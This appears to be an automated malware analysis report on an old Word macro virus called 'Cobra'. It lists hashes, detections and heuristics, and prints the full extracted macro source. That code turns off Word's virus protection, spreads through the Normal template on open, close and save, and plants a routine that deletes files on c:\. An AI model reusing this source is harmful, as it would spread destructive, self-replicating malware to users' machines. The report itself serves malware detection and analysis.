Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1c130bb508050e55…

MALICIOUS

Office (OLE)

Size: 30.0 KB
Created: 1999-02-23 04:38:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: d5fe3ef30275357141324be7983af004
SHA-1: 88a4958ea5f699a9d2a272e66cd2f4a12882b7b3
SHA-256: 1c130bb508050e555eb771afb94a40d7bc08200d5f7b52e861824f8002312dee
Risk Score: 240

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains legacy WordBasic macros, including an AutoOpen macro, which is a strong indicator of malicious intent. AutoOpen first disables Word's macro virus protection and save prompts, then copies the 'Cobra' module between the active document and the Normal template, a classic macro-virus persistence and propagation technique; the FileClose and FileSave macros repeat the copy on every close and save. The presence of 'Cobra' in the macro name and the document body, along with ClamAV detections for 'Doc.Trojan.Cobra-7' and 'Win.Trojan.C-286', strongly suggests a known macro-virus family, though specific attribution is not possible from the provided evidence alone. The AutoClose macro contains a time-based trigger: on September 11th it injects a FileExit macro that displays a "You are infected with Cobra" message box and exits Word. The FileSaveAs macro additionally installs a second module, 'ComCity', whose FileNew routine attempts to delete c:\*.* after October 11th, a destructive payload that should be weighed alongside the persistence behaviour.

Heuristics (5)

  • ClamAV: Doc.Trojan.Cobra-7 (severity: critical) [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Cobra-7
  • VBA macros detected (severity: medium; 2 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • AutoOpen macro (severity: high) [OLE_VBA_AUTOOPEN]
    AutoOpen macro: code runs automatically when the document is opened
  • Auto_Close macro (severity: high) [OLE_VBA_AUTOCLOSE]
    Auto_Close macro: code runs automatically when the document is closed
  • Legacy WordBasic auto-exec macro marker (severity: medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2785 bytes
SHA-256: 22626d1d6a5751b54728ea28af538fb2fb075ea974722eb457d5a356618a9f12
Detection: ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Cobra"
'Cobra Version 1.0B
Sub AutoOpen()
With Options
.VirusProtection = False
.SaveNormalPrompt = False
.ConfirmConversions = False
End With
MacCopToNor
MacCopToAp
End Sub
Sub MacCopToNor()
For Each ModOk In NormalTemplate.VBProject.VBComponents
If ModOk.Name = "Cobra" Then
Exit Sub
End If
Next
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:="Cobra", _
Object:=wdOrganizerObjectProjectItems
End Sub
Sub MacCopToAp()
For Each ModOk In ActiveDocument.VBProject.VBComponents
If ModOk.Name = "Cobra" Then
Exit Sub
End If
Next
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument.FullName, Name:="Cobra", _
Object:=wdOrganizerObjectProjectItems
End Sub
Sub AutoClose()
If Month(Now) = 9 And Day(Now) = 11 Then
If Documents.Count > 0 Then
If ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 1) <> "'Cobra Version 1.0B" Then
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, "'Cobra Version 1.0B"
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 2, "Sub FileExit"
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 3, "MsgBox " + """You are infected with Cobra""" + ",," + """Cobra"""
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 4, "WordBasic.FileExit"
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 5, "End Sub"
End If
End If
End If
End Sub
Sub FileClose()
MacCopToNor
MacCopToAp
WordBasic.FileClose
End Sub
Sub FileSave()
MacCopToNor
MacCopToAp
If ActiveDocument.Saved = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub FileSaveAs()
On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
For Each ModOk In ActiveDocument.VBProject.VBComponents
If ModOk.Name = "ComCity" Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, _
Name:="ComCity", Object:=wdOrganizerObjectProjectItems
Exit Sub
End If
Next
Set ModAdd = ActiveDocument.VBProject.VBComponents.Add(1)
ModAdd.Name = "ComCity"
ModAdd.CodeModule.InsertLines 1, "Sub FileNew"
ModAdd.CodeModule.InsertLines 2, "On Error Resume Next"
ModAdd.CodeModule.InsertLines 3, "dialogs(wdDialogFileNew).Show"
ModAdd.CodeModule.InsertLines 4, "If day(now)>11  and month(now)>=10 then"
ModAdd.CodeModule.InsertLines 5, "Kill " + """c:\*.*"""
ModAdd.CodeModule.InsertLines 6, "End if"
ModAdd.CodeModule.InsertLines 7, "End Sub"
End Sub